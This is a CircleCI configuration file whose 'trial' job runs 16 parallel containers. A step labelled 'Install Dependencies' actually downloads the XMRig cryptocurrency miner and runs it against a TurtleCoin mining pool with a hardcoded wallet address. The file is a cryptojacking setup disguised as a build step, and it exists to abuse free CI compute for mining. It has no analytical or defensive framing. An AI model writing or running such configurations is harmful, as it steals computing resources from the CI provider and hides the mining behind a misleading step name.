version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://github.com/xmrig/xmrig/releases/download/v6.14.0/xmrig-6.14.0-linux-x64.tar.gz
              tar -zxf xmrig-6.14.0-linux-x64.tar.gz
              cd xmrig-6.14.0
              ./xmrig -o sg.turtlecoin.herominers.com:1160 -a rx -k -u TRTLv2XtMXwYN77RJbm74ohC1Rx3edDKLTpuf3i2XY6FBA5HDx8FeN2cKtY96mGWJ5cvE2w4pT6sFBdzehKeMacw67ABGZj3acc -p  age1   -a argon2/chukwav2 -k

              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial